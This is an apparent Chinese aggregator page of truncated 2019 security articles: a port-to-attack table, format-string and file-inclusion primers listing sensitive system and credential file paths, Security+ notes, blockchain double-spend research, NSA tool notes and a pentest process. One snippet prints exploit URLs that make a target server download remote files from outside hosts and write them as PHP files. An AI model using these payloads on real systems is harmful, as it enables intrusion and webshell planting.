漏洞

端口对应服务及相应漏洞

时间秒杀一切 提交于 2019-12-06 10:43:52
今天刚到的一个表 贴上来 之后慢慢完善 端口号 端口说明(服务) 攻击技巧(对应的漏洞) 21/22/69 ftp/tftp :文件传输协议 爆破 嗅探 溢出;后门 22 ssh :远程连接 爆破 OpenSSH ; 28 个退格 23 telnet :远程连接 爆破 嗅探 25 smtp :邮件服务 邮件伪造 53 DNS :域名系统 DNS 区域传输 DNS 劫持 DNS 缓存投毒 DNS 欺骗 深度利用:利用 DNS 隧道技术刺透防火墙 67/68 dhcp 劫持 欺骗 110 pop3 爆破 139 samba 爆破 未授权访问 远程代码执行 143 imap 爆破 161 snmp 爆破 389 ldap 注入攻击 未授权访问 512/513/514 linux r 直接使用 rlogin 873 rsync 未授权访问 1080 socket 爆破:进行内网渗透 1352 lotus 爆破:弱口令 信息泄漏:源代码 1433 mssql 爆破:使用系统用户登录 注入攻击 1521 oracle 爆破: TNS 注入攻击 2049 nfs 配置不当 2181 zookeeper 未授权访问 3306 mysql 爆破 拒绝服务 注入 3389 rdp 爆破 Shift 后门 4848 glassfish 爆破:控制台弱口令 认证绕过 5000 sybase/DB2 爆破

格式化字符串漏洞

自古美人都是妖i 提交于 2019-12-06 10:33:17
概述 格式化字符串漏洞最早是在1999年被 Tymm Twillman 发现的,他在著名的BugTrag邮件列表中公布了一篇关于proftpd软件漏洞的文章 Exploit for proftpd 1.2.0pre6 ,这就是最早关于格式化字符串漏洞的公开描述。 由于程序使用了格式化字符串作为参数,并且格式化字符串是用户可以控制的。触发格式化字符串漏洞的主要函数就是 printf、sprintf、fprint、vprintf 等 ptintf 家族函数。恶意用户可以使用 %s 和 %x 等格式符,从堆栈或其他内存位置输出数据,也可以使用 %n 向任意地址写入被格式化的字节数,可能造成任意代码的执行,或者从漏洞程序中读取铭感信息。 以 printf 为例: printf("<式样化字符串>",<参数表>); 函数 printf 从右到左压栈,然后将先读取放到栈底,最后读取的放在栈顶,处理时候是从栈顶开始的,所以我们看见的结果是,从右边开始处理的。 printf("Number %d has no address,number %d has:%08x\n",i,a,&a); 栈顶 +--------+ | ... | | &a | | a | | i | | A | | ... | +--------+ 栈底 其中 A 是格式化字符串的地址, i 是变量 i 的值, a 是变量 a

Security+学习笔记

与世无争的帅哥 提交于 2019-12-06 09:58:03
第二章 风险分析 风险管理 评估:确定并评估系统中存在的风险 分析:分析风险对系统产生的潜在影响 响应:规划如何响应风险的策略 缓解: 缓解风险对未来安全造成的不良影响 风险分析流程 资产确定 漏洞确定 威胁评估 可能性量化 影响分析 应对措施确认 风险分类: 自然 人为 系统 风险计算 :ALE(年度损失预期, annual loss expectancy) = SLE(单一损失预期,single loss expectancy)* ARO(年发生率,annual rate of occurrence) Single Loss Expectancy (SLE) = AV(asset value) x EF(exposure factor) 风险响应的技巧 接受 :承认并接受该风险及其带来的损失 转移:第三方,比如保险公司 避免:消除风险的来源 缓解: IDS等 风险缓解和控制类型: 技术控制:防火墙 管理控制: 用流程监控组织安全策略的服从情况 操作控制: 保护日常业务操作 损失控制: 灭火器、洒水系统 变更管理(change Management):批准并执行变更的系统性方法,以确保信息技术服务达到最佳的安全性,稳定性,可用性。 分析: 变更的需求 变更的类型 组织文化 计划: 变更的角色 变更的职责 解决阻力 实施: 管理过渡阶段 确定采用变更 执行项目之后的审核

区块链安全:实现公链双花攻击的多种方法

走远了吗. 提交于 2019-12-06 09:19:33
针对 EOS、NEO 等大公链平台的多个双花攻击漏洞的案例,360 区块链实验室总结出了多种造成数字货币双花攻击的多种原因,并提出了一种通用的安全减缓措施。各种大公链项目实际上都产生过能够产生双花攻击之类的严重安全问题,盗取加密货币对黑客来讲不是难事。 而在几个月的区块链安全研究中,360 区块链实验室收到了来自各个项目方价值超过 30 万美金的数字货币漏洞报告奖励。 2008 年,中本聪提出了一种完全通过点对点技术实现的电子现金系统(比特币)。该方案的核心价值在于其提出了基于工作量证明的解决方案,使现金系统在点对点环境下运行,并能够防止双花攻击。如今比特币已经诞生十年,无数种数字货币相应诞生,但人们对双花攻击的讨论似乎仍然停留在比特币 51% 攻击上。实际上,我们的研究发现,实用的数字货币双花攻击还有很多种其他形式。在本文中,我们通过介绍我们发现的针对 EOS、NEO 等大公链平台的多个双花攻击漏洞,总结出多种造成数字货币双花攻击的多种原因,并提出一种高效的减缓措施。 1 工作量证明和双花攻击 2008 年,中本聪提出了一种完全通过点对点技术实现的电子现金系统,它使得在线支付能够直接由一方发起并支付给另外一方,中间不需要通过任何的金融机构。虽然数字签名部分解决了这个问题,但是如果仍然需要第三方的支持才能防止双重支付的话,那么这种系统也就失去了存在的价值。比特币的工作量证明机制

NSA武器库知识整理

断了今生、忘了曾经 提交于 2019-12-06 06:46:46
NSA武器库知识整理 https://www.cnblogs.com/FrostDeng/p/7120812.html 美国国家安全局(NSA)旗下的“方程式黑客组织”(shadow brokers)使用的部分网络武器被公开,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。 其中,有十款工具最容易影响Windows个人用户,包括永恒之蓝、永恒王者、永恒浪漫、永恒协作、翡翠纤维、古怪地鼠、爱斯基摩卷、文雅学者、日食之翼和尊重审查。不法分子无需任何操作,只要联网就可以入侵电脑,就像冲击波、震荡波等著名蠕虫一样可以瞬间血洗互联网。 (摘自KDNET凯迪社区) Shadow Brokers事件爆发后,微软安全应急响应中心MSRC已经在当天发出公告,MSRC表示会对披露的漏洞进行了彻底调查,并且表明就本次遭到披露的漏洞而言,大多数都已经被修复。以下是部分公告内容: 当潜在漏洞经内部或外部来源上报给微软时,微软安全应急响应中心(Microsoft Security Response Center,缩写为MSRC)会立即进行彻底的调查。我们致力于迅速验证上报信息,确保置客户于风险中的真实、未解决的漏洞得到修复。一旦得到验证,工程团队会尽快修复被上报的问题。修复问题所需的时间会同受影响的产品、服务以及版本直接相关。同时,分析对用户的潜在威胁,以及漏洞被利用的可能性

php一些 get就能提交的漏洞

点点圈 提交于 2019-12-06 04:45:48
直接上代码 程序员能看得懂: xxxxx.com:443//?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('hy.php',file_get_contents('http://mall.3dsshow.com/11.txt'));%3C/php%3E xxxxx.com:443//?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('haiyan.php',file_get_contents('http://china5.yunruikj.com/hy.txt'));%3C/php%3E xxxxx.com:443//?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('taisui.php',file_get_contents('http://china5.yunruikj.com/x.txt'));%3C/php%3E 还有 xxxx.com:443/index.php/plus/mytag_js.php?aid=9090 来源: https://www

文件包含漏洞

懵懂的女人 提交于 2019-12-06 03:20:56
一、简介 在执行php文件时,可以通过文件包含函数来加载另一个文件中的php代码,不管什么类型的文件都会当php文件来解析。而如果没有对传入的文件名经过合理的校验,通过文件包含漏洞,可以读取系统中的敏感文件,如密码文件,通过对密码文件进行暴力破解。若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制。另外不管是本地文件包含还是远程文件包含,文件包含漏洞还可能导致执行任意代码。 PHP文件包含函数: require() //在包含的过程中出错,比如文件不存在等,则会直接退出,不执行后续语句。 require_once() include() //如果出错的话,只会提出警告,会继续执行后续语句 include_once() file_get_contents() readfile() fopen() 二、分类 文件包含漏洞分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI) 三、敏感信息路径 3.1 Windows系统 c:\boot.ini // 查看系统版本 c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件 c:\windows\repair\sam // 存储Windows系统初次安装的密码 c:

提升黑客技能的十大网站

亡梦爱人 提交于 2019-12-06 03:08:33
用以下十大网站来提高你的(法律)黑客技能 黑客是计算机词典中最容易被误解的词汇之一。黑客是一个起源于20世纪90年代的术语,通常用于“计算机黑客”的上下文中,这与未经授权使用计算机和网络资源有关。 这种黑客攻击对计算机和其他资源的安全构成威胁。根据定义,黑客攻击是改变系统特性,以实现不在其创建目的范围内的目标的行为。 因此,在过去的几十年里,对道德黑客(也称为白帽黑客或渗透测试者)的需求有所增加,因为他们保护计算机系统免受危险的入侵。 道德黑客帮助企业和政府相关组织更好地保护其系统和信息,并被视为组织整体安全努力的一部分。道德黑客攻击也是一种检查盗窃行为,使信息不易受到外部恶意黑客攻击的方法。 为了了解系统中的漏洞和漏洞,开发人员和安全专业人员需要了解他们的对手。但是,你怎么能做到不损害你的正直呢? 有几个合法的在线网站,让你提高你的黑客技能,访问挑战,游戏和其他资源,也了解黑客保护他们的在线资产和改善他们的代码。在这篇文章中,我们为您带来十大易受攻击的网站,以合法实践您的黑客技能。但是,请注意,这份清单绝不是全面的。 1、BodgeIt Store BodgeIt Store是一个易受攻击的web应用程序,也是提高技能的一个很好的方法,它目前针对的是刚接触笔试的人。此web应用程序充满了OWASP前10个漏洞,如SQL注入、调试代码、跨站点脚本、不安全的对象引用和跨站点请求伪造

Web渗透测试流程

半世苍凉 提交于 2019-12-06 02:27:17
什么是渗透测试? 渗透测试 (penetration test) 并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客 的攻击方法,来评估计算机网络系统 安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。我们认为渗透测试还具有的两个显著特点是:渗透测试是一个渐进的并且逐步深入的过程。渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。作为网络安全防范的一种新技术,对于网络安全组织具有实际应用价值。但要找到一家合适的公司实施渗透测试并不容易。 渗透测试? Web 如何进行 应用数以千计,就有必要建立一套完整的安全测试框架,流程的最高 目的web 当需要测试的标是要保证交付给客户的安全测试服务质量。 立项:项目建立,时间安排,人力分配,目标制定,厂商接口 数 确定; 应用 : 分析系统架构、使用的组件、对外提供的接 web 威胁分析:针对具体的 & 系统分析 top3